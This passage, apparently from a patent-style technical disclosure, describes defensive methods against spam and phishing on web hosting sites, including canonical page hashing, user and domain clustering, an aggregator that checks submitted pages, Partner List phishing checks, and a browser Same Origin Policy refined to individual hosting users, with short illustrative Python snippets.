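    text = re.sub(r"<[^>]+>", " ", page_text)   # strip tags (and their links)
    text = re.sub(r"https?://\S+", " ", text)   # strip bare URLs
    text = " ".join(text.lower().split())
    step = max(1, len(text) // n_blocks)
    blocks = [text[i:i + step] for i in range(0, len(text), step)][:n_blocks]
    return frozenset(hashlib.sha1(b.encode()).hexdigest() for b in blocks)

def same_or_similar(hashes_a, hashes_b, m=3):
    # Canonically the same, or at least m hashes in common.
    return hashes_a == hashes_b or len(hashes_a & hashes_b) >= m
```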
Even without a toolbar, the engine can act, if it finds out that some of Zoltan's pages are spam. By doing a canonical reduction of most or all of Zoltan's pages, using "0046", the engine can see if the non-spam pages are canonically the same as (or similar to) pages at other domains. This uses the global scope of the engine's spidering, and assumes that when it records the spidered pages, it does the canonical reduction, in part to permit such a comparison with new pages. More generally, suppose some of Zoltan's pages are found to be "bad", by any means. (Perhaps they are pointed to by spam, as discussed earlier.) Then the method of the previous paragraph can be applied to the pages. While it is clear why the engine should look for similar bad pages, looking for similar good pages may also reveal associations between domains and pages. These actions force Zoltan to expend more effort at customizing his pages on different websites, or risk them being detected and blacklisted. Increasing the spammer's effort is desirable to both an ISP and a search engine.
10. Clusters
Here, we offer an instantiation of some of the ideas in the previous section, by showing how our cluster methods of "1745" can be extended. We draw attention to the figures in "1745", which gave examples of clusters in various metadata spaces ("metaspaces") - domain, style, hash, user and relay. (Other metaspaces are possible.) One change when we have a domain cluster, as described in Section 6, is that the "domains" might also include an extension that indicates a user at a given web hosting domain. There, we implicitly mixed the domain and user metaspaces, by bringing in the user information as a modified domain name.
Going beyond this, consider a domain cluster, where we do not apply the notation of Section 6. Suppose there are two nodes in it, connected by an edge, e.g.
apedog.com catred.com 5
From "1745", if the underlying space is the set of BMEs, then the 5 on the edge means that there are at least 5 BMEs containing both domains. However, if the cluster was made from an underlying space of users, then the above could be defined as meaning that 5 users have both domains. Here, "have" could mean that we take a user at WH, find its pages and extract domains from links in them.
We might require that at least one page in the user's set have both domains. Or we could relax this by merely requiring that the domains be from different pages of that user. Suppose temporarily that we are looking at data from just one user. By finding the clusters based on whether the connected domains must be from the same page or not, we can measure the amount of disjointedness between sets of pages, all for the same user. If such a disjointedness exists, then it could suggest a splitting of the user's interests. This could be checked against a language-dependent analysis of the pages' content.
An extension of this method involves possibly determining if there appear to be groupings in the user's pages, based on an analysis of the user's URLs. Does the URL notation suggest a division into directories and subdirectories? It does not have to. But recall that WH is considered to be a major web host. So it is likely to use a simple URL notation, for the benefit of its users. Given this, for a cluster of a user's pages to have two connected domains might involve parameters that indicate the separation between two pages, each with one of those domains, in the user's directory structure. Where the domains might be connected if the pages are separated by less than some metric that measures the "distance" between 2 files in a directory tree. This can also aid in the autoclassification of the directories.
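One plausible realization of such a distance metric, assuming the simple URL notation just described, counts the directory steps between two files via their deepest common directory:

```python
from urllib.parse import urlparse

def tree_distance(url_a, url_b):
    # Steps up from each file to the deepest directory the two share.
    dirs_a = [p for p in urlparse(url_a).path.split("/") if p][:-1]
    dirs_b = [p for p in urlparse(url_b).path.split("/") if p][:-1]
    common = 0
    for x, y in zip(dirs_a, dirs_b):
        if x != y:
            break
        common += 1
    return (len(dirs_a) - common) + (len(dirs_b) - common)

# Files in the same directory are at distance 0; files under
# Zoltan's gamble/ and cheapPills/ directories are at distance 2.
d = tree_distance("http://wh.com/Zoltan/gamble/a.html",
                  "http://wh.com/Zoltan/cheapPills/b.html")
```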
If the entity (which could be the Agg) making the clusters has access to data from other web hosting sites, then the users that produce the above might be from different sites. Plus, the entity might also add user message data, where these users are recipients or senders of electronic messages, and where the messages might have clickable links, from which domains can be found. By finding clusters through the mixing of data from these ECMs, we improve our chances of finding associations, especially those that might be indicative of spam. Note that the entity does not need to have access to the full text of the electronic messages. (So it does not have to be an ISP or message provider.) A key finding in "0046" was that canonically reduced BME data could be exported from a message provider to another organization, without letting the latter have access to the original messages. The clusters are found using the BME data.
Variants on the above procedures could be done. For example, clusters might be made that do not take all the users in WH. Instead, just the free users, or just the paid users, or just the verified users might be taken as the input to finding clusters. Or we might make clusters from user accounts that have existed for less than 30 days. Likewise, we can do these steps across different web hosting sites. So we can investigate if there are any distinctive differences between these groups of users. Perhaps free users are more likely to be spammers on some web hosts?
Another variant is for clusters to be found from users confined to one web host. Then these are compared to those clusters found from other web hosts. Here, optionally, user data from message providers might or might not also be used, when finding clusters.
Suppose in the above example of two connected nodes in a domain cluster, there are five users having both these domains. Functionally, it is useful to imagine this implemented as the digit "5" in the above schematic. The investigator can pick this, in an analysis program with a graphical user interface, and bring up a list of the users with those domains. This list is more than just a simple list of names. Picking a name lets her then look in the other metaspaces for that user, to compare the associated properties for the users in those spaces, to see if they have similar behavior. This can help her discern if possibly the users are acting in concert, or perhaps are even the same real person, who has assumed several user identities to WH. The power of these investigations is enhanced if the user data comes from different web hosts. (In this discussion of the domain metaspace, we used the instance of the Internet and the World Wide Web. Where the domains arise from clickable links in web pages or electronic messages. This clickable property is the key attribute of the Web, as contrasted to the Internet. But our remarks apply in any other type of network that has the equivalent of clickable links in a message or document. For example, there might be a telephone network, and phone messages with links being clickable phone numbers. If so, then these phone numbers are the analog of the domains.)
Imagine we are looking at the hash metaspace. In a hash cluster, derived from an underlying space of users, we might find two nodes connected like this -
08AD304... BC379008AF...
7
Here, each hash is represented as a hexadecimal string. The 7 means that there are 7 users, each with both hashes. When we say a user has both hashes, this could be taken to mean that the user's pages have been canonically reduced ["0046"], and a set of hashes made for each page. The hashes might be required to be from the same page. Or, more generally, from different pages of the same user. As with domain clusters, the users might be from one web hosting site, or from several. And data might optionally be introduced from messages sent or received by message providers. Also, hash clusters might be made with users restricted to the free, paid or verified categories.
Now consider the user metaspace. There are several ways to make clusters. One approach is to build a directed graph, containing directed edges like -
Dinesh -> Sandip
This means that one of Dinesh's pages has an outgoing link to one of Sandip's pages. Incoming links could also be used. In HTML, these might be when a page is loading an image from a URL that points to another user's page or asset. The information in redirects might also be used, if these go from one user to another. This method looks for explicit connections and can help show users that are prominent sources (many outgoing edges) or sinks (many incoming edges). Hence, these might be put under further scrutiny.
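A minimal sketch of finding such sources and sinks from the directed edges; the threshold is an arbitrary illustrative parameter:

```python
from collections import defaultdict

def sources_and_sinks(edges, threshold=10):
    # edges is a list of (from_user, to_user) pairs, one per
    # cross-user link found in the users' pages.
    out_deg, in_deg = defaultdict(int), defaultdict(int)
    for src, dst in edges:
        out_deg[src] += 1
        in_deg[dst] += 1
    sources = [u for u, d in out_deg.items() if d >= threshold]
    sinks = [u for u, d in in_deg.items() if d >= threshold]
    return sources, sinks
```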
Another method is to derive user clusters from an underlying space of BMEs. We might find two nodes connected like this -
Janet - Zoltan
Here, Janet and Zoltan are assumed to be users at WH. If they are from different websites, then there might be the notation -
somewhere.com/Janet wh.com/Zoltan
8
In either instance, the 8 means that there are 8 BMEs present in both Janet's and Zoltan's sets of BMEs, where these sets are derived by canonical reduction of their web pages. Clicking on the 8 brings up a list of the common BMEs, from which the investigator can find more details.
If WH makes available the extra data about users that was discussed in Section 3, then more analysis options emerge. For example, the building of user clusters might also include some graphical display of when the user accounts were made. Or the users might be restricted to those made in some time interval. This searches for temporal correlations, since if a spammer makes several accounts, she is likely to do so over a short time interval. If she increases this interval, then it takes longer for her to set up to issue spam pointing to these users. We look for characteristics that are inherently hard for her to obscure.
Another example could be the making of clusters from users with less than some number of pages. And then comparing these clusters to those from users with pages greater than or equal to that number.
Note that the above description of a user cluster gives a higher level view of pages within a web hosting site, or across such sites, since a user node in the cluster represents all the pages owned by that user. In itself, this summary view, and the decomposition of the site's pages into clusters may be useful to the investigator (or the site) in understanding the interest structure of the users.
By using cross-ECM data, we can enhance the making of user clusters. Suppose we can now access BMEs made from electronic messages. In each BME, the user information might be about the case where the user is the recipient or where the user is the sender, where, in general, these are different from the users who have pages at the hosting sites. Here, when we say "user cluster", we mean the latter users. It is now possible that in such a cluster, two users are connected because, e.g. message A has a link to an URL of a file owned by Janet, while message B has a link to an URL of a file owned by Zoltan. Where both messages produce the same BME. This is possible because in the canonical steps of "0046", links are removed from the message, before hashing is done. Hence we can use both the web pages and messages that link to those pages to correlate users.
The above is based on an exact match of BMEs from Janet and Zoltan. Following "0046", we can look for similar matches. Where 'similar' can be defined as two BMEs having m hashes the same, with m < n = number of hashes in a BME, and the investigator can choose a given m value. Given that Janet and Zoltan each have several BMEs, then some of Janet's BMEs might be similar to some of Zoltan's. Hence, a metric might be defined that measures the average similarity between each user's BMEs. It could be used to look for users that might be related in some manner. Perhaps the users are part of a link farm, where each user has some pages with boilerplate common across this set of users?
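The following sketch shows one way these definitions might be computed, with each BME represented as a set of hashes. The normalization chosen for the average is only one possibility.

```python
def bme_similar(bme_a, bme_b, m):
    # Two BMEs (sets of n hashes) are similar if they share
    # at least m hashes, with m < n.
    return len(bme_a & bme_b) >= m

def average_similarity(bmes_a, bmes_b):
    # Average pairwise hash overlap between two users' BME sets,
    # normalized to [0, 1].
    if not bmes_a or not bmes_b:
        return 0.0
    total = sum(len(a & b) / max(len(a | b), 1)
                for a in bmes_a for b in bmes_b)
    return total / (len(bmes_a) * len(bmes_b))
```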
The second approach complements the first. It can be used to find associations between users that have no explicit connection between them.
We could also combine both approaches, making clusters with directed and non- directed edges, to further expand the scope of searching for associations. This can be useful in looking for link farms, for example. Where the spammer sets up several user accounts, with same or similar pages, because this is less effort. And these pages then point to certain pages, possibly external to those hosts. The use of BMEs lets us search for the user accounts, which probably have no direct links between them. While the pointing to common external pages reinforces the chance of a link farm. Because one could imagine non-spammer users that have very different pages, and which link to a common, favorite website. But if the linking pages are canonically same or similar, it suggests otherwise.
Given the making of domain and user clusters, these can be used if the Agg finds a user to be invalid. Then, the domains or other users that it links to in the clusters can be scrutinized, to see if these might be invalid. Care has to be taken, because the spammer might deliberately put in links to innocent sites, as a countermeasure. Also, the Agg can look at domains and users that link to the invalidated user. This may be more suspect than outgoing links from the latter. The countermeasure done by the spammer for outgoing links could typically be to well known websites. But for incoming links, who knows about that account? Often, it would be an obscure account.
From email, we derived a metaspace of relay information, where the relays are the purported computers that forwarded an email to its destination. For the case of websites, there might be no simple analog to a relay metaspace.
It is also possible to make style clusters, along the lines of "1745". But it should also be realized that, implicitly, style information could (and probably should) be used in several of the above suggested analyses. For example, when making a user cluster, the styles of users within the same cluster could be compared. Styles that occur frequently amongst many users in a cluster might be used to characterize the entire cluster. Or, styles that occur only in a subset of the cluster might suggest a natural subdivision of the cluster. Also, if styles are found for entire clusters, then this gives a means of comparing clusters, and a basis for classifying clusters.
11. Antiphishing
Thus far, we have considered the case of general spam. But there is a specific type of spam, phishing, which is important enough to discuss here. For general purpose spam, typically if enough complaints are reported to the web host, then it will terminate that user's account, as being in violation of the Terms of Service, and all the user's pages will be removed.
But if the pages and the messages that point to these pages are phishing, then other alternatives might be considered. Especially if an Agg sits between the web host ("WH") and the ISPs and other message providers.
First, we should say that our antiphishing methods of "2245" and "2458" suffice to detect if a message is phishing, where it claims to be from Bank0.com, say, and where the phishing link in the message is to http://wh.com/mike/. This assumes that the Agg has Bank0 as a customer, and hence has the bank's Partner List. Then, since in general wh.com is not on that PL, we have objectively found phishing. This works because our antiphishing method uses a PL and not a blacklist. Now consider what could happen when the Agg gets notified of this phishing message from a browser. Unlike general spam, where it might want to accumulate enough complaints from various ISPs, before telling WH, phishing needs a faster response. Hence, the Agg might contact WH, as soon as the Agg has verified that indeed a browser has detected a phishing message with a link to, say, http://wh.com/free/Zoltan.
WH could do several things. It might immediately shut down Zoltan's pages, to prevent anyone else from being defrauded after this time. Or it might discard any requests for that page, and Zoltan's other pages (if any), but let investigators get the pages. This protects unwary visitors, while possibly letting investigators submit fake personal data that could be used to entrap the phisher. If the pages have outgoing links, these could be followed to see if they lead to the phisher.
WH could use our antispam methods of making a BME to see if any pages by its other users are canonically the same or similar to Zoltan's pages. This handles the case where Zoltan has opened several accounts at WH, and is also using those as destinations for phishing. Along these lines, the Agg might make BMEs out of Zoltan's pages, and then see if these are present at other websites in H. It might send these BMEs to those sites, and ask them to check these against their users' pages. Or for some sites, the Agg might do this task.
We also generalize the definition of the contents of a Partner List in "2245", to include the possibility that an entry might refer to a user's pages at a web host. Though given that Partner Lists are expected to be published by large companies for an antiphishing usage, this new type of entry might be rare.
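To illustrate, here is a hedged sketch of the Partner List check described above, extended with this new type of entry naming a user's prefix at a web host. The list contents (including the "wh.com/verifiedbank0" entry) and the user-scope extraction are hypothetical stand-ins.

```python
# Illustrative Partner List for Bank0: entries may be whole domains
# or, per the generalization above, a user's prefix at a web host.
PARTNER_LIST = {"bank0.com": {"bank0.com", "wh.com/verifiedbank0"}}

def host_and_user(url):
    # Reduce an URL to its host, and to host/first-path-component
    # (a crude stand-in for a web host's published user scope).
    rest = url.split("//", 1)[-1]
    host = rest.split("/", 1)[0]
    path = rest[len(host):].strip("/")
    user = path.split("/", 1)[0] if path else ""
    return host, (host + "/" + user if user else host)

def is_phishing(claimed_sender, link_url):
    # A message claiming to be from Bank0, whose link resolves to
    # neither a listed domain nor a listed user prefix, is phishing.
    pl = PARTNER_LIST.get(claimed_sender, set())
    host, host_user = host_and_user(link_url)
    return host not in pl and host_user not in pl

assert is_phishing("bank0.com", "http://wh.com/mike/login.html")
assert not is_phishing("bank0.com", "http://wh.com/verifiedbank0/promo.html")
```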
12. A Specialized Search Engine
Thus far, we discussed using the Agg mostly to help ISPs and message providers, by standing between them and various major web hosts. The Agg does tasks that otherwise the ISPs and providers might have to do themselves. In essence, the Agg factors out these tasks and the expertise implied by them. In this Section, we show in a like manner how the Agg can help the web hosts, and do tasks that they might otherwise have to perform.
Consider the web host WH. When one of its users submits or changes a page, WH might wait some period of time, before making the page publicly available. During this, it could subject the page to various antispam and antiphishing analyses.
One possibility is that it might send the addresses of these pages to the Agg. Here the Agg would function in an antispam or antiphishing capacity. For example, it might use our Antispam and Antiphishing Provisionals. Especially by making BMEs of the submitted pages, and comparing these to other known BMEs. Here, in an extension of the way we made BMEs in "0046", these BMEs would also include in some manner the URLs that pointed to the pages that went into those BMEs. The Agg is well suited to do this analysis, since it could receive submitted pages from a variety of web hosts. Plus, it would have the expertise to develop and run specialized testing, that even a major web host might not have.
Of course, if the Agg does any tests, WH would expressly permit it to access those pages, while denying general access from the rest of the network.
Whether WH or the Agg does testing, to be practical, these tests should usually be automated. It must not be that a significant manual effort is involved. Our methods are well suited to this. Manual involvement might be needed only if a page is objectively found to be phishing or pharming, or if a page has enough styles that strongly suggest spam or phishing.
If the Agg tests, it can be considered to act as a specialized search engine. WH sends it an URL and essentially asks, "Have you seen this before?" and "Is it spam or phishing?". Here, of course, we are referring to the page pointed to by the URL, and not the URL itself. For the first question, the Agg might answer with a count of 0 or greater. Where 0 means no canonical equivalent of the page has been seen before by the Agg. And 1 or greater means it has, and the number is the number of such pages in the BME.
If the page has been seen before, the Agg's reply might include URLs of some of those pages, which in general will be at different websites. WH might specify if it wants these other URLs to be of other domains, or of its domain, or both. It might be just interested in matching URLs in its domain, because it controls these URLs, and can decide, for example, if those URLs and the URL that was sent to the Agg, might be taken offline.
Suppose that WH submits a URL, and that page is a new BME to the Agg. It records this BME. Hence, if later other web hosts, or even WH, send other URLs that are found to have pages in this BME, then WH might be told by the Agg that its first URL's page has now been seen at other locations. So suppose the antispam analysis of the first page said it was inconclusive whether the page was spam or not. If later, WH is told that many copies exist, it may take this as an extra factor in re-evaluating whether the page is spam.
For reasons of computational and network efficiency, the Agg might not tell WH whenever every new instance of the page is seen. The Agg or WH might have an agreed upon policy saying that WH be told only every 10 instances, say. Or, furthermore, that once WH has been told for that URL, that it no longer needs to be notified if more instances are seen by the Agg.
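Functionally, the Agg's service might then look like the following sketch, with a page represented by its canonical hashes and the notification policy being the illustrative "every 10 instances" above. All names are hypothetical.

```python
BME_INDEX = {}      # frozenset of page hashes -> list of URLs seen with that BME
NOTIFY_EVERY = 10   # agreed policy: tell WH only every 10th sighting

def agg_submit(url, page_hashes):
    # WH submits a URL plus the page's canonical hashes and asks:
    # "Have you seen this before?" Returns the count of previously
    # seen pages in this BME (0 means canonically new) and some of
    # their URLs.
    seen = BME_INDEX.setdefault(page_hashes, [])
    prior = list(seen)       # sightings before this submission
    seen.append(url)         # record this sighting for later queries
    return len(prior), prior[:10]

def should_notify(count):
    # Notify WH only at every Nth new sighting of its page.
    return count > 0 and count % NOTIFY_EVERY == 0
```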
WH might have a policy of only submitting a subset of URLs to the Agg. For example, it might only do so for free users. Or for free users whose accounts have existed for less than 30 days.
While we have described using the Agg as a search engine, its role is far easier than that of a general purpose search engine. It does not have to spider and record all or most of the pages on the network. It decides which web hosts it will do its searching for, and they tell it what to spider on their websites. Plus, when the Agg finds an answer to a query about a URL's page, there are only two possibilities. Either 0 results, which means the page is canonically new to the Agg, or 1 result, which means there is already 1 BME at the Agg, for that page. Whereas a general search engine may have thousands of results for a query, and it has to expend considerable effort in applying a ranking system to return a subset in an ordered list that the user is likely to find useful. That ranking may have subjective elements. Whereas our situation has an objective binary response. This parallels the other tasks performed by the Agg in the Antiphishing Provisionals.
There is a nuance to this, if the Agg searches for BMEs similar to a given BME for a submitted URL. Then, instead of just the binary result for an exact match, there might be an arbitrary number of similar results. But even here, this situation is still simpler than for a general search engine, since the similar results are objectively found.
The searching for similar BMEs might be something that the Agg does for its own internal analysis. Or perhaps WH might ask for this to be done. Either if no exact match to its URL's page is found, or even if such an exact match is found. If so, then some subset of the similars might be sent to WH. Or the result of some function of those similars. For example, the function might simply be to tell WH that some number of similar BMEs or pages were found, across various websites. Here, the number of similar pages would be the sum of the totals of the pages in each of the similar BMEs.
When searching for similar BMEs, or even exact BMEs, this might also be done over a set of BMEs found from messages. The idea is to see if parts (or all) of the text of the page in question also appear in messages. In general, whatever the sources of a BME, it is a measure of whether a block of data (web page or message) has been seen by others.
A variant on the above idea of using an Agg is that different web hosts peer with each other, in order to exchange and use such information. This follows the idea in "0046" of various message providers exchanging BMEs derived from their message feeds, in order to better see which messages are bulk. There, the use of BMEs was to protect the privacy of the original messages. Here, this is less of an issue, since most of the URLs point to pages that will be or are already publicly available.
Along these lines, suppose WH has a user who writes a page that is meant to sit behind a password. So the page is meant to appear only if the visitor has earlier furnished a valid username and password (or maybe just a password). Assume here that WH permits a user to have such pages and the password capability that these imply. For privacy reasons, if an Agg is used, WH might not wish to have it be able to read this page. (Though perhaps it might, according to its Terms of Service with its users.) Then, as in "0046" with messages, WH might have software that makes a BME out of the page, and sends the BME, instead of an URL, to the Agg. Here, the BME might be considered a degenerate BME, inasmuch as it wraps only one page. Then, the Agg looks in its data to see if it has any BME with the same hashes. If so, it replies accordingly to WH.
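A sketch of this privacy-preserving variant, where WH computes the degenerate BME locally, so only hashes ever cross the network; the reduction is again only a stand-in for the canonical steps of "0046":

```python
import hashlib

def degenerate_bme(page_text, n_blocks=4):
    # A BME wrapping just this one page, computed by WH itself.
    text = " ".join(page_text.lower().split())
    step = max(1, len(text) // n_blocks)
    blocks = [text[i:i + step] for i in range(0, len(text), step)][:n_blocks]
    return frozenset(hashlib.sha1(b.encode()).hexdigest() for b in blocks)

def agg_lookup(bme, stored_bmes):
    # Agg side: does any stored BME carry the same hashes?
    return any(bme == b for b in stored_bmes)
```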
Another variant on this section is that WH allows the immediate publication of its users' pages. But it then also does the above tests, or sends the URLs to the Agg to do so. And later, if a page is found to be spam or phishing, it is taken off the network. With possibly other pages by that user.
In either the case where WH immediately publishes pages, or waits till the Agg analyses them, there is yet another advantage of the Agg over a general search engine. When someone uses a browser to ask the latter engine, she expects a rapid reply, taking at most a few seconds. Thus the general search engines have had to heavily build up their hardware, network and methods to meet this need. However, the time constraints on the Agg are far more generous, in the context of antispam or antiphishing.
Suppose WH immediately publishes the pages. It wants to know from the Agg, as soon as possible, when these might be spam. Suppose the spammer sends out a million messages, pointing to a given page, Rho, and that these messages reach their destinations at the instant that WH publishes Rho. For WH, this is the most time constrained arrangement it faces. But the limiting factor is a combination of these items: Not all the recipients will be currently logged in. Of those that are, not all will immediately read their mail. At some destinations, antispam methods might put the given spam into a bulk folder or have deleted it. The recipients who are reading mail will be less likely to read those in their bulk folders. Finally, for spam that is actually read, not all will click on the link to Rho. For the latter, the response rate to spam is usually less than one percent. For a spammer to make money, Rho needs to be available for as long as possible, because of all these issues. At least several hours, preferably days. Hence, suppose WH gets a reply from the Agg that Rho is spam, and this takes 10 minutes, whereupon WH shuts down Rho. That interval is two orders of magnitude less than having Rho be up for a day or more. If the income that the spammer would get from Rho is roughly proportional to the time that Rho is accessible, up to some maximum time interval, then WH has reduced the income by two orders of magnitude. And this interval of 10 minutes is in turn two orders of magnitude longer than the typical response time of a general search engine.
The above estimates are qualitative. But they should suffice to show this advantage of our Agg search engine over a general search engine.
The Agg also has an advantage, this time with respect to ISPs applying antispam methods against incoming messages. Consider the above, where a spammer sends out perhaps a million messages, that point to a page Rho at WH. The Agg (or WH if it is not using the Agg) applies some antispam method against Rho. If essentially the same method is used by the ISPs which get the spam messages, then collectively those ISPs have to do a million times the computation done by the Agg (or WH).
Given the easier computational constraints on the Agg, compared to ISPs analyzing messages for spam, the Agg might thus be able to apply more intensive analysis. Including, but not limited to the following:
a. If the Agg uses our Antispam Provisionals, but now applied to web pages, it might make more hashes, compared to an ISP on a message. This allows for a finer grained test for similar entities.
b. The Agg might follow links in the page, to see if the destinations are in a blacklist. Because of the possible relatively slow response when one goes out on the network via a link, this may be prohibitive when processing messages. But for pages, it may be feasible.
c. A spammer who writes a page might put an image, in which text is written as a bitmap. This evades content filters that operate on explicit text data. Some spam messages already do this, and it can be expected that spam pages might do likewise. Hence, the Agg might apply Optical Character Recognition methods against images in the page, to try and extract text. In general, for messages, this is too intensive and hence slow to be typically used.
In this section, we have described the Agg acting as a search engine, where the Agg performs other tasks described elsewhere in this Invention and in the Antiphishing Provisionals. The method of this section also applies if the Agg just does the tasks described here.
13. Same Origin Policy
Many browsers run scripting languages. Currently, the most common is JavaScript, though others may be possible. Typically, a browser has code, often called a "Security Manager", that implements various security policies, one of which might be called a "Same Origin Policy" (SOP). It is meant to prevent a script loaded from website Alpha, when the browser visits a page at Alpha, from reading or changing properties in another window of the same browser, if the latter window is not at an address in Alpha.
In "JavaScript: The Complete Reference" by Thomas Powell and Fritz Schneider, ISBN 0-07-225357-6, McGraw-Hill 2004, Chapter 22, it points out a serious limitation in the above policy. Imagine a user, Mike, with pages at wh.com, under the address http://wh.com/mike/, and another user, Sue, with pages under http://wh.com/sue/. Here, for simplicity, we are imagining a simple format for a user's pages. Then, Mike could write a page with a script that could then access another window pointing to any of Sue's pages. The reference says that there is no known solution to this problem.
In the context of this Invention, it can be seen that this problem is really two problems. First, being able to identify a web hosting site. Second, knowing a user's scope in the addressing scheme for that site. Hence, if the browser has a list of major web hosting sites, and those publish their f() mappings that define their users' scopes, then the browser could enforce an SOP that is now fine grained down to the level of each user. Here, the browser might either get f() directly from the sites, where its list of sites might be hardwired, or it might use an Agg.
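A minimal sketch of such a fine-grained SOP check follows. The published f() mapping for wh.com is represented by a hypothetical path rule; in practice the browser would obtain each host's real mapping from the site itself or from an Agg.

```python
from urllib.parse import urlparse

# Published f() mappings of major web hosts: how to extract the
# owning user from a path. The format here is hypothetical.
USER_SCOPE = {
    "wh.com": lambda path: path.split("/")[1] if path.count("/") >= 1 else None,
}

def same_origin(url_a, url_b):
    # Classic SOP (same scheme and host), refined on known hosting
    # sites to also require the same owning user.
    a, b = urlparse(url_a), urlparse(url_b)
    if (a.scheme, a.netloc) != (b.scheme, b.netloc):
        return False
    f = USER_SCOPE.get(a.netloc)
    if f is None:
        return True  # not a known hosting site; classic SOP suffices
    return f(a.path) == f(b.path)

assert not same_origin("http://wh.com/mike/x.html", "http://wh.com/sue/y.html")
assert same_origin("http://wh.com/sue/a.html", "http://wh.com/sue/b/c.html")
```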
We explain why it is advantageous to solve this problem. It could be considered a cross-site scripting attack, except that here the action is within one site. Mike can attack Sue or visitors to Sue's pages, where Sue can be any other user of WH. Suppose he attacks Sue. This could take various forms. If Sue has a page where the visitor reads some information, Mike might try to alter the text, and change whatever impression Sue is trying to make, possibly damaging Sue's reputation by giving misleading information under her apparent name.
Or, suppose Sue's page has a form that the visitor types in some data. Mike might add or change that data, such that when it is submitted to WH's server, an attack (like a buffer overflow or SQL injection) is done. Here, the attack probes whether the WH server guards against these. Plus, if the server hands off the data to code that Sue supplies, the attack might be against that code.
Another possibility is if Sue has pages that are not publicly viewable. Maybe she requires a visitor to login with a username and password, using a page with https. Then, assuming the visitor logged in, subsequent pages also use https. Currently, the SOP requires that both browser windows use the same protocol. Hence, Mike might have his page with an https, but not require any login. Then, his script can access another window with Sue's private pages. Here, Mike's code might "merely" copy those pages over the network to some address (probably outside wh.com) controlled by Mike. Or, the script might also actively alter the page or information submitted to it, in the manner described above.
Why might Sue have private pages? Perhaps she is performing e-commerce at wh.com. For a hosting site, e-commerce users might be higher margin than a generic user who is not doing transactions. By being able to offer transaction processing, the site is likely to be able to charge Sue more than a generic user.
Thus far, Mike is attacking Sue or WH. He might also garner information about a visitor, without attacking Sue or WH. For example, if his script can read a form that the visitor fills in on Sue's page, that might have personal information about the visitor. Mike could harvest this, perhaps for identity fraud.
Note in the above examples that some of these attacks might not be possible in a particular combination of browser and scripting language. But browsers and scripting languages change over time, and new scripting languages might emerge. Some or all of the above attacks may be possible now or in the future. Plus, consider a particular browser and scripting language. Suppose one of the above attacks cannot be performed in this environment, assuming correct operation of the browser. But the browser may have a bug, which turns out to enable the attack, in the absence of our method. It is a practical reality that all the major browsers (Internet Explorer, Mozilla, Firefox, Opera, etc) have had bugs, and this might not change in the future, given the ever increasing complexity of browsers. Hence, provided that the hypothesized bug does not invalidate the browser using our method, then the method has merit, in acting to prevent the attack.
It might be asked - what are the chances that a visitor to Mike's page at WH will also visit Sue? One way might be for Mike's page to open a new window, at Sue's WH address, while the script in the original window then might try to access it. Or, Mike's current page might open a new window, which has the attack script, while the current page tells its window to go to Sue's address. The latter method then might have Sue's page existing in a window before the script runs in another window. This might also have the script window being minimised or made transparent, so that the visitor is unlikely to see it. Mike's method might amount to a Man In The Middle attack.
The above should illustrate the current dangers of a scripting attack within a web hosting site. And it should show the usefulness of our method in preventing this.
Another useful extension of the idea of this Section is in dealing with cookies. Most browsers only let a script from a domain read and write cookies from that domain. But for WH, this means that any user who reads or writes cookies can have those read or altered by a script located at another user's page. A user's cookie has no protection from others at WH. But if our method were implemented, a browser could enforce that a user's cookie can only be read or written by scripts at her pages.
Another advantage of our countermeasure is that it can be done automatically, i.e. by default, by the browser. This gets around configuration policies that have to be set manually by someone at the browser. (Quite aside from current browsers not being able to handle the above steps in our method that know about the user scope in a given hosting site.)
We have discussed using our method for major web hosting sites. But an important extra usage applies to financial websites. Imagine a bank, Bank0, with the website bank0.com. It has pages that are publicly viewable with http, and login pages that use https. Plus, if a customer logs in, she then sees pages with her account information, that use https. Bank0 might have several computers for its web servers. These access various databases. Different departments might control different computers. Some of this is for redundancy. But another reason is security.
Suppose the logins are at https://bank0.com/secure/, with subsequent successful logins returning pages starting with this address. Now imagine the marketing department having pages at bank0.com/market, where these might use http or https. If the department was subverted by someone, Mike, who could change pages, then he might use the above scripting attack to get customer information. And possibly to initiate false transactions, if the visitor logs into her account. This attack is also more likely, and lucrative, than the general case of a hosting site, because for a bank, a visitor is more likely to have several windows visiting different bank departments.
In response, Bank0 might publish subdivisions of its web addresses, like "secure" and "market". These correspond to the users that we have discussed in the bulk of this Invention. Then, the browser, possibly using an Agg, might apply these subdivisions just as it did for users. Here, there would be a list of major banks, and each bank would publish this information about itself. The difference from a Partner List of "2245" is that this new information is about internal entities.
Here, we discussed banks. Clearly, the method could be applied to any major corporation. Also, for Bank0, we used the example where its subdivisions were to the right of its domain. With trivial changes, our method could also be applied when Bank0 has subdomains, like secure.bank0.com and market.bank0.com.
14. Dynamic Styles
In "1174", we discussed "styles" or heuristics, that can be used to characterize an electronic message or web page. Some of these styles are generally known to antispam practitioners. For instance, if a message has invisible text, which is where the foreground color of the text is the same as the background color. While other styles are derived from our inventions in ["0046", "1745", "5037", "1899", "1014", "1174" ], namely in the canonical steps leading to the making of Bulk Message Envelopes (BMEs).
In "1698", we explained dynamic hyperlinks and how these could be used to evade a simple application of a domain blacklist against links in the body of a message. We also described there how the text, or a subset of the text, of a message might likewise be dynamically constructed. We called that a Dynamic Text style.
These two ideas can be combined, and applied to messages or web pages. For many styles, defined in "1174" and in the other Provisionals, it might be meaningful to define corresponding "Dynamic Styles". (The styles defined in "1698" are already "dynamic".) These could be considered special cases of Dynamic Text. Just as a spammer might use a dynamic hyperlink to evade a simple use of a blacklist, so too might she generate a Dynamic Style, to evade a simple detection of that style in the message or page.
For example, consider again the invisible text style. The spammer might attempt to write a scripting routine that sets the background color of the document. The routine might well be written in a deliberately complex manner, to defy a trivial programmatic analysis that would reveal the output color without executing the routine.
Hence, our method in "1698" of using master-slave threads to try to extract hyperlink values can be used here with trivial modification, to search for Dynamic Styles. Every Dynamic Style implies a Dynamic Text style. But the Dynamic Styles give us a more precise understanding about what is varying in the Dynamic Text.
A further refinement is to classify a Dynamic Style as Wrapped, Local or Remote. Here, a Wrapped Dynamic Style has a routine which only uses input values that are in the document. A Local Dynamic Style has a routine which can also use input values that are derived from the machine running the routine, but not from other machines. Whereas a Remote Dynamic Style can also use input values derived from other machines on the network.
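This classification might be implemented by instrumenting the slave thread's host functions and recording what the routine touches while it runs, as in this sketch:

```python
from enum import Enum

class DynamicStyleKind(Enum):
    WRAPPED = 1  # routine reads only values in the document itself
    LOCAL = 2    # also reads the local machine (clock, locale, ...)
    REMOTE = 3   # also reads other machines over the network

def classify(read_local_state, read_network):
    # Booleans recorded by the instrumented slave while executing
    # the style's routine.
    if read_network:
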